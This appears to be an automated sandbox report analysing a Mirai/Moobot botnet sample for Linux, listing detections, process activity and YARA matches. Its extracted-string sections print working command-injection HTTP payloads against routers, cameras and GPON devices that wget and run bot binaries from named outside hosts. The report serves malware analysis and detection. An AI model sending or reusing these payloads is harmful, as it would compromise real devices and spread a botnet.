Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
86xklcDnGU.elf

Overview

General Information

Sample name:86xklcDnGU.elf
renamed because original name is a hash value
Original sample name:e3f4deb0a74a97e90b7ebec168ae6a9e.elf
Analysis ID:1447655
MD5:e3f4deb0a74a97e90b7ebec168ae6a9e
SHA1:446d068f1ab079dc17960e1039354d019d8765a4
SHA256:8f85c0f7e7c783069a92967a0ddc6a5557ffd1b1633aa49e10680dca208b4c44
Tags:32elfgafgytsparc
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Moobot
Contains symbols with names commonly found in malware
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1447655
Start date and time:2024-05-26 11:00:08 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:86xklcDnGU.elf
renamed because original name is a hash value
Original Sample Name:e3f4deb0a74a97e90b7ebec168ae6a9e.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@0/0
  • Skipping network analysis since amount of network traffic is too extensive
Command:/tmp/86xklcDnGU.elf
PID:6223
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • 86xklcDnGU.elf (PID: 6223, Parent: 6143, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/86xklcDnGU.elf
    • sh (PID: 6225, Parent: 6223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/86xklcDnGU.elf bin/busybox; chmod 777 bin/busybox"
      • sh New Fork (PID: 6227, Parent: 6225)
      • rm (PID: 6227, Parent: 6225, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 6228, Parent: 6225)
      • mkdir (PID: 6228, Parent: 6225, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6229, Parent: 6225)
      • mv (PID: 6229, Parent: 6225, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/86xklcDnGU.elf bin/busybox
      • sh New Fork (PID: 6230, Parent: 6225)
      • chmod (PID: 6230, Parent: 6225, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/busybox
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
86xklcDnGU.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    86xklcDnGU.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
      86xklcDnGU.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        86xklcDnGU.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x20160:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20174:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20188:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2019c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x201b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x201c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x201d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x201ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20200:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20214:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20228:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2023c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20250:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20264:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x20278:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2028c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x202a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x202b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x202c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x202dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x202f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        SourceRuleDescriptionAuthorStrings
        6254.1.00007fc040011000.00007fc040036000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
          6254.1.00007fc040011000.00007fc040036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            6254.1.00007fc040011000.00007fc040036000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x20160:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20174:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20188:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2019c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x201b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x201c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x201d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x201ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20200:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20214:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20228:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2023c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20250:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20264:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x20278:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2028c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x202a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x202b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x202c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x202dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x202f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            6250.1.00007fc040011000.00007fc040036000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
              6250.1.00007fc040011000.00007fc040036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                Click to see the 12 entries
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 86xklcDnGU.elfAvira: detected
                Source: 86xklcDnGU.elfVirustotal: Detection: 55%Perma Link
                Source: 86xklcDnGU.elfReversingLabs: Detection: 52%
                Source: 86xklcDnGU.elfString: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7D
                Source: 86xklcDnGU.elfString: %7B%22hostname%22%3A%20%221%27wget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20totolin.selfrep%3Becho%27%22%2C%20%22dhcpMtu%22%3A%20%221500%22%2C%20%22proto%22%3A%209%2C%20%22dnsMode%22%3A%20%220%22%2C%20%22ttlWay%22%3A%20%221%22%2C%20%22lcpEchoEnable%22%3A%20%221%22%2C%20%22clone%22%3A%20%220%22%2C%20%22cloneMac%22%3A%20%221C%3AF4%3A08%3A53%3A15%3A60%22%2C%20%22topicurl%22%3A%20%22setWanCfg%22%2C%20%22token%22%3A%20%229d48f879b6940d711cd1449c6f4b4186%22%7DPOST /cgi-bin/cstecgi.cgi HTTP/1.1
                Source: 86xklcDnGU.elfString found in binary or memory: http://0.0.0.0/bins/sora.mips;
                Source: 86xklcDnGU.elfString found in binary or memory: http://104.244.74.231/jack5tr.selfrep.sh
                Source: 86xklcDnGU.elfString found in binary or memory: http://104.244.74.231/mips
                Source: 86xklcDnGU.elfString found in binary or memory: http://104.244.74.231/sora.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$
                Source: 86xklcDnGU.elfString found in binary or memory: http://104.244.74.231/x86
                Source: 86xklcDnGU.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: 86xklcDnGU.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: 86xklcDnGU.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: 86xklcDnGU.elfString found in binary or memory: http://woshishabi.zzy.rip/wget.sh$
                Source: 86xklcDnGU.elfString found in binary or memory: http://woshishabi.zzy.rip/x86

                System Summary

                barindex
                Source: 86xklcDnGU.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: ELF static info symbol of initial sampleName: attack.c
                Source: ELF static info symbol of initial sampleName: attack_get_opt_int
                Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
                Source: ELF static info symbol of initial sampleName: attack_init
                Source: ELF static info symbol of initial sampleName: attack_kill_all
                Source: ELF static info symbol of initial sampleName: attack_method_nudp
                Source: ELF static info symbol of initial sampleName: attack_method_stdhex
                Source: ELF static info symbol of initial sampleName: attack_method_tcp
                Source: ELF static info symbol of initial sampleName: attack_ongoing
                Source: ELF static info symbol of initial sampleName: attack_parse
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: asus_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: asus_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: dlinkscanner_fake_time
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: dlinkscanner_rsck
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: dlinkscanner_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: dlinkscanner_setup_connection
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: hexPayload
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: hnapscanner_fake_time
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: hnapscanner_rsck
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: hnapscanner_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: hnapscanner_setup_connection
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: huawei_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: huawei_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: lblink_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: lblink_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: linksys_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: linksys_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: nuuo_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: nuuo_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: realtekscanner_fake_time
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: realtekscanner_rsck
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: realtekscanner_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: realtekscanner_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: realtekscanner_setup_connection
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: scanner_init
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: totolink_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: totolink_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: tplink_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: tplink_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: tr064_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: tr064_scanner_rawpkt
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: tvt_scanner_pid
                Source: 86xklcDnGU.elfELF static info symbol of initial sample: tvt_scanner_rawpkt
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://104.244.74.231/mips -O .0721; /bin/busybox chmod 777 .0721; ./.0721 huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: bin/busybox
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+vaicalon;chmod+777+*;sh+vaicalon+gpon.selfrep`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial sampleString containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.74.231/jack5tr.selfrep.sh+-O+anngu;chmod+777+*;sh+anngu+gpon.selfrep`&ipv=0POST /HNAP1/ HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Ares.mpsl%3B+wget%20http%3A%2F%2F104.244.74.231%2Fmpsl%20-O%20.0721%3B%20chmod%20777%20.0721%3B%20.%2F.0721%20link.selfrep%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1h/bin/busybox/bin/watchdog/bin/systemdbin/busyboxbin/watchdogbin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777
                Source: Initial samplePotential command found: GET /device.rsp?opt=sys&cmd=_S_O_S_T_R_E_A_MAX_&mdb=sos&mdc=uname%20-a%3Bwget%20http%3A%2F%2F15.235.163.157%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20TBKDvR HTTP/1.1
                Source: Initial samplePotential command found: GET /ping.cgi?pingIpAddress=google.fr%3Bwget%20http%3A%2F%2F104.244.74.231%2Fmips%20-O%20.0721%3Bchmod%20777%20.0721%3B.%2F.0721 HTTP/1.1
                Source: Initial samplePotential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
                Source: Initial samplePotential command found: GET /
                Source: Initial samplePotential command found: GET /shell?cd%20%2Ftmp%3Brm%20-rf%20*%3Bwget%20104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bchmod%20777%20.072l%3Bsh%20.072l%20jaws HTTP/1.1
                Source: Initial samplePotential command found: GET /login.cgi?cli=aa%20aa%27%3Bwget%20http%3A%2F%2F104.244.74.231%2Fjack5tr.selfrep.sh%20-O%20.072l%3Bsh%20.072l%20dlink%27%24 HTTP/1.1
                Source: Initial samplePotential command found: GET /HEAD /POST /HTTP/1.1 404 Not FoundServer: Apache %d
                Source: Initial samplePotential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1
                Source: Initial samplePotential command found: GET /debugging_center_utils_.php?log=%3Bwget%20http%3A%2F%2Fwoshishabi.zzy.rip%2Fjack5tr.selfrep.sh%20-O-%20%7C%20sh%20nuuo HTTP/1.1w5q6he3dbrsgmclkiu4to18npavj702fPOST /picdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /index.php?s=/index/hink
                Source: Initial samplePotential command found: GET /%s HTTP/1.0
                Source: 86xklcDnGU.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 6254.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 6250.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 6223.1.00007fc040011000.00007fc040036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: 86xklcDnGU.elf PID: 6223, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: 86xklcDnGU.elf PID: 6250, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: 86xklcDnGU.elf PID: 6254, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: classification engineClassification label: mal92.troj.linELF@0/0@0/0
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6234/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/6236/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1582/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/3088/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/230/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/110/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/231/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/111/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/232/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1579/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/112/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/233/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1699/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/113/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/234/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1335/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1698/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/114/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/235/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1334/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/1576/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/2302/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/115/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/236/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/116/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/237/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/117/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/118/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/910/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/119/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/912/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/10/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/2307/cmdlineJump to behavior
                Source: /tmp/86xklcDnGU.elf (PID: 6233)File opened: /proc/11/cmdlineJump to behavior
